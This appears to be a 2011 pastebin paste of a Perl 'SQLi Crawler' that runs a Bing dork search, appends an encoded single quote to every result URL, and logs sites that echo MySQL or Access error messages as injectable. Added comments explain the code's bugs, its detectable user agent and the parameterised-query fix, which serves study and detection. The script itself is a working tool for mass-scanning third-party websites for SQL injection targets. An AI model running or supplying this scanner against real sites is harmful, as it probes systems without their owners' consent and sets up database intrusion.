
Untitled

a guest Aug 31st, 2011 652 Never
  1. #!/usr/bin/perl
  2.  
  3. use strict;
  4. use warnings;
  5. use HTTP::Request;
  6. use LWP::UserAgent;
  7.  
  8. ############### File-scoped lexicals: the menu code and sql_scan share all of these (the sub declares no variables of its own).
  9. my $dork; # search query typed by the operator in sql_scan
  10. my $url;
  11. my $i;
  12. my $request;
  13. my $useragent;
  14. my $response;
  15. my $start;
  16. my $end;
  17. my $result;
  18. my $fl;
  19. my $link;
  20. my $req;
  21. my $ua;
  22. my $result2;
  23. my $res;
  24. my $save;
  25. my $pages; # page count exactly as typed on STDIN
  26. my $page; # loop bound derived from $pages in sql_scan
  27. my $choice;
  28. ##############
  29. my @z; # every probed URL whose response matched a database-error signature
  30.  # Banner: a literal q{} string, printed once at start-up.
  31. print q{
  32.      _ ____        _  
  33.     | |  _ \      | |  
  34.   __| | |_) | ___ | |_
  35.  / _` |  _ < / _ \| __|
  36. | (_| | |_) | (_) | |_
  37.  \__,_|____/ \___/ \__|
  38.                        
  39. ################################
  40. ##      / SQLi Crawler /      ##
  41. ##      Private Edition       ##
  42. ##      ~Coded by dbx~        ##
  43. ################################
  44.  
  45. };
  46.  # The label below is the target of the `goto MainMenu` at the end of sql_scan, so the menu is shown again after each run.
  47. MainMenu:
  48.  
  49. print "------------------------\n";
  50. print "Enter [1] To Begin SQLi.\n";
  51. print "Enter [2] To Exit.\n";
  52. print "------------------------\n\n";
  53. print "Your Choice: ";
  54.  
  55. chomp ($choice = <STDIN>);
  56. print "\n";
  57.  # Dispatch on the typed choice; both tests are string comparisons (eq).
  58. if ($choice eq 1) {&sql_scan} # `&sql_scan` without parentheses calls the sub with the caller's current @_
  59. if ($choice eq 5) {die;} # the menu advertises 2 for exit but this tests for 5; any input other than 1 reaches the end of the top-level code, so the script ends either way
  60.  
  61. sub sql_scan # Search-driven scan: fetches Bing result pages for a query, requests each result link with %27 appended, and flags responses that contain database error text.
  62. {
  63.  # Takes no arguments; reads the query and page count from STDIN and works on the file-scoped variables.
  64. print "[+] Enter Bing! dork: ";
  65. chomp ($dork = <STDIN>);
  66. print "\n";
  67. print "[+] How Many Pages To Leech?: ";
  68. chomp ($pages = <STDIN>);
  69. print "\n";
  70.  # String concatenation, not arithmetic: a page count of 5 gives the loop bound 51.
  71. $page = $pages.'1';
  72.  
  73. print "[~] Crawling...\n\n";
  74.  
  75. for ($i = 0; $i <= $page; $i=$i+11) # $i is sent as Bing's `first` result offset, advanced by 11 per request
  76. {
  77.  # $dork is interpolated into the query string exactly as typed.
  78. $url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";
  79.  # A fresh LWP::UserAgent is built per request and never configured, so requests carry LWP's default libwww-perl User-Agent, a usable indicator in web-server logs.
  80. $request = HTTP::Request->new(GET => $url);
  81. $useragent = LWP::UserAgent->new();
  82. $response = $useragent->request($request);
  83. $result = $response->content;
  84.  # The response status is not checked; whatever body came back is scanned.
  85. $start = '<h3><a href="';
  86. $end = '" onmousedown=';
  87.  # Capture the href between the two markers for every result link on the page.
  88. while ($result =~ m/$start(.*?)$end/g)
  89.  
  90. {
  91.          $fl = $1;
  92.          $link = $fl."%27"; # %27 is a URL-encoded single quote, appended to the end of the link as found
  93.          $req = HTTP::Request->new(GET => $link);
  94.          $ua = LWP::UserAgent->new();
  95.          $res = $ua->request($req);
  96.          $result2 = $res->content;
  97.  # Error-based heuristic: flags the link when the body contains MySQL/PHP error text (mysql_fetch_ already covers mysql_fetch_array); a page that merely quotes such text would match too.
  98.           if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
  99.           {
  100.                 push @z, $link;
  101.                 print "[+] MySQL Vulnerable: $link\n\n";
  102.           }
  103.  # These strings are Microsoft JET / Access ODBC driver errors, although the message below labels them MsSQL.
  104.           elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
  105.           {
  106.                 push @z, $link;
  107.                 print "[+] MsSQL Vulnerable: $link\n\n";
  108.           }
  109.  # Anything else is reported as not vulnerable. None of the signatures match when database errors are not echoed to the client; parameterised queries remove the underlying flaw.
  110.           else {
  111.                
  112.                         print "[-] $link <- Not Vulnerable\n\n";
  113.           }
  114. }
  115.  
  116. }
  117.         print "Vulnerable Links:\n"; # summary of everything collected in @z, which is never cleared, so later runs repeat earlier hits
  118.         print "-----------------------------------\n";
  119. foreach (@z)
  120. {
  121.         print "$_ \n\n";
  122. }
  123. print "Save Into A Text File? (Y or N): ";
  124. chomp ($save = <STDIN>);
  125.  # Only an upper-case Y saves. The two-argument open on a bareword handle appends to Vulns.txt in the current directory and its result is not checked.
  126. if ($save eq 'Y')
  127. {
  128.         print "Saving File...\n\n";
  129.         open(vuln_file, ">>Vulns.txt");
  130.         foreach (@z)
  131.         {
  132.                 print vuln_file "$_ \n";
  133.         }
  134.         close(vuln_file);
  135.         print "File Saved!\n\n";
  136. }
  137. goto MainMenu; # jumps out of the sub to the label in the top-level code, re-displaying the menu
  138. }